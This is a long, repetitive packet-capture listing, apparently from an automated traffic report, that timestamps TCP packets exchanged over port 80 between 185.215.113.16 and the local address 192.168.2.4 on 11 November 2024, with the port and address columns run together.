                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.400356054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.400367022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.400396109 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.400418043 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444451094 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444463968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444504976 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444510937 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444557905 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444566965 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444574118 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444644928 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444675922 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444688082 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444695950 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444700956 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444714069 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444720984 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444741964 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444745064 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444753885 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444777966 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.444801092 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509332895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509346962 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509357929 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509362936 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509373903 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509383917 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509394884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509437084 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509488106 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509497881 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509507895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509520054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509562969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509562969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509562969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509651899 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509716034 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509846926 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509860039 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509870052 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509882927 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509893894 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509896040 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509907007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509918928 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509931087 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509931087 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509943962 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509963989 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509987116 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.509999990 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510013103 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510025978 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510039091 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510042906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510051966 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510056019 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510068893 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510080099 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510086060 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510118008 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510135889 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510323048 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510334015 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510344982 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510354996 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510365963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510373116 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510380030 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510386944 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510410070 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510437965 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510473013 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510483980 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510498047 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510523081 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510552883 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510643005 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510656118 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510667086 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510679007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510689974 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510690928 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510729074 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510796070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510833979 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510974884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510987997 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.510998011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511010885 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511018038 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511023045 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511032104 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511035919 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511051893 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511085033 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511157036 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511174917 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511188030 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511200905 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511204004 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511215925 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511235952 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511308908 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511328936 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511341095 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511352062 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511362076 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511373997 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511380911 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511399031 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511420965 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511651993 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511663914 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511674881 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511686087 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511698008 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511699915 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511708975 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511720896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511733055 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511733055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511745930 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511755943 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511761904 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511779070 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511795998 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511806011 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511812925 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511826038 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511837006 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511838913 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511851072 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511857033 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511878014 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511912107 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.511991978 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512005091 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512015104 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512044907 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512057066 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512172937 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512185097 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512196064 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512207985 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512219906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512224913 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512233973 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512248039 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512263060 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512290955 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512334108 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512346983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512356997 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512367010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512378931 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512382030 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512392044 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512403965 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512414932 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512420893 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512429953 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512439013 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512460947 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512468100 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512471914 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512480021 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512514114 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512531042 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512650967 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512664080 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512701988 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512818098 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512830973 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512840986 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512850046 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512861013 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512864113 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512881041 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512887001 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512895107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512907982 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512919903 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512967110 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.512988091 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513010979 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513134956 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513154984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513170004 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513180971 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513187885 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513201952 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513238907 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513281107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513293028 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513309956 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513324022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513331890 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513336897 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513350010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513361931 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513365984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513398886 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513412952 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513607025 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513621092 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513634920 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513693094 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513936043 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.513994932 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514142990 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514153957 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514167070 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514177084 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514192104 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514213085 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514317036 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514329910 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514338970 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514352083 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514368057 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514369965 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514381886 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514400959 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514413118 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514458895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514471054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514497995 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514525890 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514653921 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514664888 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514676094 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514693022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514697075 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514712095 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514724970 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514731884 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514736891 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514740944 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514749050 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514760971 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514771938 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514781952 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514790058 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514801979 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514812946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514812946 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514827013 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514841080 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514841080 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514862061 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.514878988 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515048981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515059948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.515070915 CET8049762185.215.113.16192.168.2.4
